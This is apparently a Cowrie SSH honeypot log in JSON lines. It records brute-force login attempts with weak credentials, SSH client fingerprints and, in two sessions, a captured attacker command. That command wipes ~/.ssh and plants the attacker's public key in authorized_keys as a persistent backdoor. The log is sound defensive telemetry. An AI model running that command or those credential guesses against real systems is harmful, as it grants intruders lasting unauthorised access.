{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:52:32.045285Z","src_ip":"212.227.235.229","session":"387e5359a135"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.7.4","message":"Remote SSH version: SSH-2.0-libssh_0.7.4","sensor":"my-vps","timestamp":"2025-08-31T05:52:32.744508Z","src_ip":"120.27.154.152","session":"3eb8bd5af467"}
{"eventid":"cowrie.session.closed","duration":"30.4","message":"Connection lost after 30.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:52:32.745645Z","src_ip":"120.27.154.152","session":"3eb8bd5af467"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty-12","message":"login attempt [root/qwerty-12] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:52:33.072351Z","src_ip":"212.227.235.229","session":"387e5359a135"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:52:33.608508Z","src_ip":"212.227.235.229","session":"387e5359a135"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:52:33.609221Z","src_ip":"212.227.235.229","session":"387e5359a135"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:52:33.610143Z","src_ip":"212.227.235.229","session":"387e5359a135"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:52:33.869554Z","src_ip":"212.227.235.229","session":"387e5359a135"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:52:34.445761Z","src_ip":"212.227.235.229","session":"387e5359a135"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:52:34.446502Z","src_ip":"212.227.235.229","session":"387e5359a135"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:52:34.705902Z","src_ip":"212.227.235.229","session":"387e5359a135"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:52:34.706826Z","src_ip":"212.227.235.229","session":"387e5359a135"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60108,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9a21578220e","protocol":"ssh","message":"New connection: 212.227.235.229:60108 (1.2.3.4:22) [session: e9a21578220e]","sensor":"my-vps","timestamp":"2025-08-31T05:52:34.962124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:52:34.963233Z","src_ip":"212.227.235.229","session":"e9a21578220e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:52:35.220222Z","src_ip":"212.227.235.229","session":"e9a21578220e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55552,"dst_ip":"1.2.3.4","dst_port":22,"session":"7097751d3217","protocol":"ssh","message":"New connection: 212.227.235.229:55552 (1.2.3.4:22) [session: 7097751d3217]","sensor":"my-vps","timestamp":"2025-08-31T05:52:35.916293Z"}
{"eventid":"cowrie.session.closed","duration":"81.7","message":"Connection lost after 81.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:52:36.144249Z","src_ip":"212.227.235.229","session":"92ca25f17726"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:52:36.249269Z","src_ip":"212.227.235.229","session":"e9a21578220e"}
{"eventid":"cowrie.login.failed","username":"test2","password":"letmein","message":"login attempt [test2/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T05:52:36.645963Z","src_ip":"212.227.235.229","session":"49d7a2e2cbf9"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:52:37.509341Z","src_ip":"212.227.235.229","session":"e9a21578220e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32888,"dst_ip":"1.2.3.4","dst_port":22,"session":"348a981f80af","protocol":"ssh","message":"New connection: 212.227.235.229:32888 (1.2.3.4:22) [session: 348a981f80af]","sensor":"my-vps","timestamp":"2025-08-31T05:52:37.763855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:52:37.764859Z","src_ip":"212.227.235.229","session":"348a981f80af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:52:38.023047Z","src_ip":"212.227.235.229","session":"348a981f80af"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:52:38.436800Z","src_ip":"212.227.235.229","session":"49d7a2e2cbf9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:52:39.092197Z","src_ip":"212.227.235.229","session":"348a981f80af"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:52:39.349007Z","src_ip":"212.227.235.229","session":"387e5359a135"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:52:39.349817Z","src_ip":"212.227.235.229","session":"348a981f80af"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:52:40.864291Z","src_ip":"212.227.235.229","session":"7097751d3217"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:52:40.865294Z","src_ip":"212.227.235.229","session":"7097751d3217"}
{"eventid":"cowrie.session.closed","duration":"106.9","message":"Connection lost after 106.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:52:45.681486Z","src_ip":"120.27.154.152","session":"21f786f61153"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51468,"dst_ip":"1.2.3.4","dst_port":22,"session":"264d89054d71","protocol":"ssh","message":"New connection: 212.227.125.160:51468 (1.2.3.4:22) [session: 264d89054d71]","sensor":"my-vps","timestamp":"2025-08-31T05:52:50.894798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:52:51.362185Z","src_ip":"212.227.125.160","session":"264d89054d71"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:52:51.362893Z","src_ip":"212.227.125.160","session":"264d89054d71"}
{"eventid":"cowrie.login.failed","username":"test2","password":"letmein","message":"login attempt [test2/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T05:52:53.370559Z","src_ip":"212.227.125.160","session":"264d89054d71"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:52:54.918542Z","src_ip":"212.227.125.160","session":"264d89054d71"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser123","message":"login attempt [esuser/esuser123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:53:04.377752Z","src_ip":"212.227.235.229","session":"7097751d3217"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52272,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b98fddc6236","protocol":"ssh","message":"New connection: 212.227.235.229:52272 (1.2.3.4:22) [session: 1b98fddc6236]","sensor":"my-vps","timestamp":"2025-08-31T05:53:07.673852Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:53:07.674782Z","src_ip":"212.227.235.229","session":"1b98fddc6236"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:53:07.953833Z","src_ip":"212.227.235.229","session":"1b98fddc6236"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":52542,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6ff8523b5f7","protocol":"ssh","message":"New connection: 43.159.36.188:52542 (1.2.3.4:22) [session: b6ff8523b5f7]","sensor":"my-vps","timestamp":"2025-08-31T05:53:08.855017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:53:08.855746Z","src_ip":"43.159.36.188","session":"b6ff8523b5f7"}
{"eventid":"cowrie.login.success","username":"root","password":"server@123","message":"login attempt [root/server@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:53:09.111747Z","src_ip":"212.227.235.229","session":"1b98fddc6236"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:53:09.116805Z","src_ip":"43.159.36.188","session":"b6ff8523b5f7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:53:09.694011Z","src_ip":"212.227.235.229","session":"1b98fddc6236"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:53:09.694886Z","src_ip":"212.227.235.229","session":"1b98fddc6236"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:53:09.696045Z","src_ip":"212.227.235.229","session":"1b98fddc6236"}
{"eventid":"cowrie.session.closed","duration":"34.0","message":"Connection lost after 34.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:09.868355Z","src_ip":"212.227.235.229","session":"7097751d3217"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:09.976823Z","src_ip":"212.227.235.229","session":"1b98fddc6236"}
{"eventid":"cowrie.login.failed","username":"kiosk","password":"kiosk","message":"login attempt [kiosk/kiosk] failed","sensor":"my-vps","timestamp":"2025-08-31T05:53:10.219832Z","src_ip":"43.159.36.188","session":"b6ff8523b5f7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:53:10.595854Z","src_ip":"212.227.235.229","session":"1b98fddc6236"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:53:10.596529Z","src_ip":"212.227.235.229","session":"1b98fddc6236"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:53:10.878151Z","src_ip":"212.227.235.229","session":"1b98fddc6236"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:10.879057Z","src_ip":"212.227.235.229","session":"1b98fddc6236"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35854,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3ed0f1e4825","protocol":"ssh","message":"New connection: 212.227.235.229:35854 (1.2.3.4:22) [session: e3ed0f1e4825]","sensor":"my-vps","timestamp":"2025-08-31T05:53:11.155825Z"}
